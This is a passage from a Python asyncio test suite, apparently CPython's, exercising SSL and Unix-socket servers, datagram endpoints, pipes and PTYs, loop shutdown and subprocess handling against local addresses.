sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
